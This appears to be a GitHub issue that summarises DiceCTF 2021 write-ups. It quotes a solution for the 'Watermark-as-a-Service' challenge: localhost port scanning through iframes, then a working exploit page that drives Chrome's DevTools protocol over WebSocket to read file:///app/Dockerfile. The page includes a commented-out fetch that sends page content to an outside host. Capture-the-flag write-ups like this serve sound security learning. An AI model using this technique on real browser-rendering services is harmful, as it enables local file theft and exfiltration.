aszx87410 / ctf-writeups

ctf writeups

DiceCTF 2021 - Summary #20

Open aszx87410 opened 3 years ago

aszx87410 commented 3 years ago

Writeups

  1. DiceCTF 2021 - Babier CSP
  2. DiceCTF 2021 - Missing Flavortext
  3. DiceCTF 2021 - Web Utils
  4. DiceCTF 2021 - Build a Panel
  5. DiceCTF 2021 - Build a Better Panel
  6. DiceCTF 2021 - Web IDE

=====

(screenshot: 2021-02-08 08:35:51)
aszx87410 commented 3 years ago

https://github.com/tlyrs7314/ctf-writeups/tree/main/DiceCTF2021/Watermark-as-a-Service

aszx87410 commented 3 years ago

Another solution from SodaLee: https://discord.com/channels/805956008665022475/805962699246534677/808204024993284106

To solve WaaS, first you need to scan ports on 127.0.0.1 to get the "debugging-port". Since the port returns a valid http response, I wrote a script to generate 100+ small iframes (src=http://127.0.0.1:) at one time, and observe the screenshot. I found the port was 33907 last night.

Then we can make the browser visit http://127.0.0.1:33907/json/new?file:/// via a 30x redirection, get the WebSocket URI, connect, and send "Runtime.evaluate" to execute "document.body.innerHTML".

<body>
<script>
// WebSocket URL of the DevTools page target on the debugging port found above
// (33907); the target id is specific to the poster's challenge instance.
window.ws = new WebSocket('ws://127.0.0.1:33907/devtools/page/20D8B6FBC4238BC94DF01D00E9C0F9E3')
ws.onerror = (e) => { document.writeln('error') }
// Every DevTools Protocol response is written into the page so it appears in
// the service's screenshot.
ws.onmessage = (e) => {
  document.writeln("<p>" + e.data + "</p>");
}

ws.onopen = () => {
  ws.send(JSON.stringify({
    id: 1,
    method: "Page.captureScreenshot"
  }))
  ws.send(JSON.stringify({
    id: 2,
    method: "Page.navigate",
    params: {
      url: "view-source:file:///app/Dockerfile"
    }
  }))
  ws.send(JSON.stringify({
    id: 3,
    method: "Runtime.evaluate",
    params: {
      expression: "location.href"
    }
  }))
  ws.send(JSON.stringify({
    id: 4,
    method: "Runtime.evaluate",
    params: {
      expression: "document.body.innerHTML//fetch('http://cf43dffe.y7z.xyz/1', {method:'POST', body:document.body.innerHTML})"
    }
  }))
}

//setTimeout(() => { window.ws.close() }, 3000)
</script>
</body>